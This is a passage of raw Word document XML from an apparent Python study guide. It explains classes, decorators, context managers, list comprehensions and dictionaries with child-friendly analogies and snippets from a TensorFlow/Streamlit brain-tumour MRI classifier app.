      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A programming paradigm based on creating "classes" (blueprints) that bundle data attributes with specific functions ("methods").</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cookie cutter is a class; the delicious gingerbread cookies you bake using that cutter are objects. Every cookie has arms, legs, and icing, but you can decorate each one differently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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class PatientScan:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      def __init__(self, patient_id: str, scan_type: str):</w:t>
              <w:br/>
              <w:t xml:space="preserve">          self.patient_id = patient_id</w:t>
              <w:br/>
              <w:t xml:space="preserve">          self.scan_type = scan_type</w:t>
              <w:br/>
              <w:t xml:space="preserve">          </w:t>
              <w:br/>
              <w:t xml:space="preserve">      def get_summary(self):</w:t>
              <w:br/>
              <w:t xml:space="preserve">          return f"Patient {self.patient_id} ({self.scan_type})"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notebooks/02_model_training.ipynb</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from tensorflow.keras import layers, models</w:t>
              <w:br/>
              <w:t xml:space="preserve">  </w:t>
              <w:br/>
              <w:t xml:space="preserve">  # Instantiating Keras Layer objects from Layer classes</w:t>
              <w:br/>
              <w:t xml:space="preserve">  gap_layer = layers.GlobalAveragePooling2D(name="global_avg_pooling")</w:t>
              <w:br/>
              <w:t xml:space="preserve">  dropout_layer = layers.Dropout(0.3, name="dropout_1")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keras models and layers are structured as OOP objects holding internal trainable state (weights and biases).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Without OOP, tracking millions of floating-point weights across dozens of neural network layers would require thousands of loose global arrays.</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4. Decorators (`@decorator_name`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A special Python syntax that wraps a function, modifying or extending its behavior without permanently altering the function's internal code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like putting a waterproof raincoat on a child before they go outside: the child is still the exact same child, but now they have the superpower of staying dry in the rain!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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def announce(func):</w:t>
              <w:br/>
              <w:t xml:space="preserve">      def wrapper(*args, **kwargs):</w:t>
              <w:br/>
              <w:t xml:space="preserve">          print("Starting task...")</w:t>
              <w:br/>
              <w:t xml:space="preserve">          result = func(*args, **kwargs)</w:t>
              <w:br/>
              <w:t xml:space="preserve">          print("Task finished!")</w:t>
              <w:br/>
              <w:t xml:space="preserve">          return result</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return wrapper</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  @announce</w:t>
              <w:br/>
              <w:t xml:space="preserve">  def greet(name):</w:t>
              <w:br/>
              <w:t xml:space="preserve">      print(f"Hello, {name}!")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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@st.cache_resource(show_spinner=False)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  def load_neuroscan_model():</w:t>
              <w:br/>
              <w:t xml:space="preserve">      model = tf.keras.models.load_model(model_path)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      base_model = [l for l in model.layers if "mobilenet" in l.name.lower()][0]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return model, base_model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tells Streamlit: *"Run this expensive 12 MB model load operation ONCE. Keep the resulting object in RAM. On all future page refreshes, return the cached object instantly."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Removing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@st.cache_resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> forces TensorFlow to reload the model from disk every time the user clicks a button, introducing an unacceptable 5-second lag per click.</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5. Context Managers (`with` statement)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A structure that manages the allocation and release of resources, ensuring setup and cleanup code runs reliably (even if errors occur).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like an automatic door at a supermarket: it opens the moment you walk near it, and closes safely behind you the second you walk through, so the air conditioning never escapes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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with open("sample.txt", "r") as file:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      data = file.read()</w:t>
              <w:br/>
              <w:t xml:space="preserve">  # File is automatically closed here, even if reading failed!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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with tf.GradientTape() as tape:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      conv_features = base_model(prep_img, training=False)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      tape.watch(conv_features)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>And for UI layouts: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with col_left:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      st.markdown("#### Visual Saliency (Grad-CAM)")</w:t>
              <w:br/>
              <w:t xml:space="preserve">      st.image(superimposed_img)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> For </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.GradientTape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, it records forward operations onto a computational tape for automatic differentiation. For Streamlit columns, it routes UI elements into specific visual columns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manual gradient tracking or manually clearing tape memory leads to memory leaks and unrecorded backpropagation graphs.</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6. List Comprehensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A concise, expressive syntax for creating a new list by transforming or filtering elements of an existing iterable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like walking past a basket of mixed fruit and picking out only the red strawberries, placing them neatly onto your plate in a single swift motion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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scores = [0.1, 0.4, 0.8, 0.95]</w:t>
              <w:br/>
              <w:t xml:space="preserve">  percentages = [s * 100 for s in scores]</w:t>
              <w:br/>
              <w:t xml:space="preserve">  # Result: [10.0, 40.0, 80.0, 95.0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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base_model = [l for l in model.layers if "mobilenet" in l.name.lower()][0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Finds the specific base model layer in one readable line without writing a clunky multi-line loop with temporary tracking variables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Writing five lines of nested loops makes code verbose and increases risk of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IndexError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</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7. Dictionary Unpacking and Key-Value Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Storing and accessing data using associative key-value pairs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), enabling $O(1)$ constant-time lookup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like a coat-check room at a theatre: you give the attendant your coat number (key), and they instantly hand you your specific coat (value).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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class_colors = {"glioma": "#ef4444", "notumor": "#10b981"}</w:t>
              <w:br/>
              <w:t xml:space="preserve">  print(class_colors["glioma"])  # Returns '#ef4444'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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CLASS_DISPLAY = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">      "glioma": "Glioma Tumor",</w:t>
              <w:br/>
              <w:t xml:space="preserve">      "meningioma": "Meningioma Tumor",</w:t>
              <w:br/>
              <w:t xml:space="preserve">      "notumor": "Healthy (No Tumor)",</w:t>
              <w:br/>
              <w:t xml:space="preserve">      "pituitary": "Pituitary Tumor"</w:t>
              <w:br/>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Decouples internal dataset folder names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notumor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) from human-friendly clinical presentation titles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Healthy (No Tumor)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Without dictionaries, code requires chains of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if/elif/else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> statements across every display function.</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8. Exception Handling (`try...except`) and Conditional Guards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defensive programming constructs that catch runtime errors and prevent program crashes when encountering unexpected states.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
